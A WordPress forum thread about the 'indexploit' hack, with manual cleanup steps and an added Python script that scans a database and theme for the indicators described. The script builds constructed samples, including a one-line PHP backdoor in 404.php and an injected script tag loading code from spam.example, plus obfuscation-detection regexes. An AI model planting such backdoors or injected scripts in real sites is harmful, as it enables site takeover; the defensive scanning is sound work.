Hello All,

    I was hoping someone would have some insight on what the intentions of this hack are. It seems a good 50% – 60% of our sites were hit with some form of brute force attack through gravity forms.

    It seems the hack successfully goes through and usernames are all changed to “indexploit”. None of the passwords are changed, and I cannot find any other files that were changed or any other malicious intent thus far.

    Has anyone else dealt with this issue? If so, what was the intent of the hacker?

Viewing 4 replies - 1 through 4 (of 4 total)
Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    If so, what was the intent of the hacker?

    To spam and get links on your site. It’s always that, they’re looking to make money from those links.

    Carefully follow this guide to delouse your site. Until you do so someone else will walk in and add more malware code.

    When you’re done, you may want to implement some (if not all) of the recommended security measures.

    I’m having the same problem, did you finally find a solution?

    Thread Starter awilliams2489

    (@awilliams2489)

    Yes, we eventually found a solution. In our case, the hack was at the server level, which is why it was so widespread and our cleanups were ineffective. We had no choice but to migrate to new hosts, since our original host did little to nothing as far as support went and we didn’t have direct access to the server, so there was nothing we could do.

    I would contact your hosting provider first and make sure they aren’t having issues. The final goal of this particular hack in our case was to use your site(s) for phishing scams, so I recommend you take care of it as soon as possible.

    If you have a clean backup use that instead of the steps below and update all plugins/themes since an outdated theme/plugin is probably how they got through in the first place. If you don’t have a backup (you poor soul), you can follow the steps below, but keep in mind I’m not going into a ton of detail with each step and am not liable if you break your site.

    To clean up each site that didn’t have a backup we had to:
    1. BACK UP THE ENTIRETY OF THE COMPROMISED SITE IN CASE YOU BREAK IT!! That includes all files and your database.
    2. Reinstall fresh core files.
    3. Reinstall fresh plugin files.
    4. Scan the entirety of the old theme for any signs of a hack. Delete any bad files/code and re-upload the cleaned version. The 404.php and header.php files were big offenders.
    5. Search through the uploads folder for any bad files. Remove them and re-upload your now cleaned uploads folder onto the site.
    6. Delete any unused themes or plugins.
    7. Scan the database for any signs of the hack; here were the problem areas:
    – wp_users table: make sure to change the username and password for each user no matter what. I did all this manually in the database.
    – wp_posts table: look out for any posts not made by you. They are easy to spot and generally reference Cialis or porn.
    – wp_options table: the hackers generally inject HTML into the “blogdescription”.

    This doesn’t guarantee anything; however, we have not seen a hack come back yet on our new server (knock on wood). Here’s some WordPress documentation on cleaning hacks if you need further assistance: https://codex.wordpress.org/FAQ_My_site_was_hacked. Hopefully this helps, good luck.
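The indicators listed in steps 4 and 7 above (a theme's 404.php/header.php carrying injected code, wp_users logins rewritten to “indexploit”, spam posts in wp_posts, HTML injected into the blogdescription option) can be checked mechanically before you start editing tables by hand. The script below is an added example written for this thread; it is not the poster's tooling or anything from WordPress. It uses an in-memory SQLite database with a cut-down copy of the three table layouts to stand in for the site's MySQL database, a temporary directory to stand in for the theme, and constructed sample rows and files; the list of PHP obfuscation patterns (eval, base64_decode, gzinflate, str_rot13, superglobals fed straight into a call) is an assumption, not a complete signature set. Note that it only finds what the post describes in the database and theme; it says nothing about a compromise at the hosting/server level, which is what the poster concluded was the real cause.

```python
import os
import re
import sqlite3
import tempfile

# Indicators named in the thread: logins rewritten to "indexploit", spam posts,
# HTML injected into blogdescription. The keyword list and regexes are ours.
HIJACKED_LOGIN = "indexploit"
SPAM_WORDS = ("cialis", "viagra", "porn")
HTML_TAG = re.compile(r"<[^>]+>")

# Obfuscation constructs commonly seen in injected PHP (assumed list, not exhaustive).
PHP_SUSPICIOUS = re.compile(
    r"eval\s*\(|base64_decode\s*\(|gzinflate\s*\(|str_rot13\s*\(|"
    r"\$_(?:GET|POST|REQUEST)\s*\[[^\]]*\]\s*\)",
    re.IGNORECASE,
)


def check_database(conn, known_author_ids):
    """Return (table, detail) findings for the three tables the post names."""
    findings = []
    cur = conn.cursor()
    # wp_users: any login that has been rewritten to the attacker's name
    for uid, login in cur.execute("SELECT ID, user_login FROM wp_users ORDER BY ID"):
        if login.lower() == HIJACKED_LOGIN:
            findings.append(("wp_users", f"ID {uid}: user_login rewritten to '{login}'"))
    # wp_posts: posts by an author you do not recognise, or carrying spam keywords
    for pid, author, title, content in cur.execute(
            "SELECT ID, post_author, post_title, post_content FROM wp_posts ORDER BY ID"):
        text = f"{title} {content}".lower()
        if author not in known_author_ids:
            findings.append(("wp_posts", f"ID {pid}: unknown post_author {author}"))
        elif any(word in text for word in SPAM_WORDS):
            findings.append(("wp_posts", f"ID {pid}: spam keyword in '{title}'"))
    # wp_options: blogdescription should be plain text, never markup
    row = cur.execute(
        "SELECT option_value FROM wp_options WHERE option_name = 'blogdescription'"
    ).fetchone()
    if row and HTML_TAG.search(row[0]):
        findings.append(("wp_options", f"blogdescription contains HTML: {row[0][:60]!r}"))
    return findings


def scan_theme(theme_dir):
    """Map each .php file under theme_dir to the suspicious snippets found in it."""
    hits = {}
    for root, _dirs, files in os.walk(theme_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                matches = [m.group(0)[:40] for m in PHP_SUSPICIOUS.finditer(fh.read())]
            if matches:
                hits[os.path.relpath(path, theme_dir)] = matches
    return hits


def build_demo():
    """Constructed sample data standing in for a compromised site (not real artefacts)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT);
        CREATE TABLE wp_posts (ID INTEGER, post_author INTEGER, post_title TEXT, post_content TEXT);
        CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
        INSERT INTO wp_users VALUES (1, 'indexploit', 'admin@example.com');
        INSERT INTO wp_users VALUES (2, 'editor', 'editor@example.com');
        INSERT INTO wp_posts VALUES (10, 2, 'Welcome', 'Our first post.');
        INSERT INTO wp_posts VALUES (11, 1, 'Cheap cialis online', '<a href="http://spam.example">buy</a>');
        INSERT INTO wp_posts VALUES (12, 99, 'Hello', 'Posted by an account that does not exist.');
        INSERT INTO wp_options VALUES ('blogname', 'Example Site');
        INSERT INTO wp_options VALUES ('blogdescription',
            'Just another site<script src="http://spam.example/x.js"></script>');
    """)
    theme = tempfile.mkdtemp(prefix="theme-")
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write("<?php wp_head(); ?>\n<body>\n")          # clean file
    with open(os.path.join(theme, "404.php"), "w") as fh:   # injected backdoor
        fh.write("<?php get_header(); eval(base64_decode($_POST['c'])); ?>\n")
    return conn, theme


if __name__ == "__main__":
    conn, theme = build_demo()
    for table, detail in check_database(conn, known_author_ids={1, 2}):
        print(f"[db] {table}: {detail}")
    for path, snippets in scan_theme(theme).items():
        print(f"[theme] {path}: {snippets}")
```

Against a real site, point `scan_theme` at the theme directory (and the uploads folder, which should contain no .php files at all) and run the three queries in `check_database` against the live database; treat every hit as something to remove from a fresh copy rather than edit in place, since the post's step 1 backup is what you fall back on if a cleanup goes wrong.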

    Thank you very much for your detailed answer. Since my initial message, I moved the account to a new server and the accounts are there without problems. Let’s see what happens! Thank you.

  • The topic ‘Indexploit Hack’ is closed to new replies.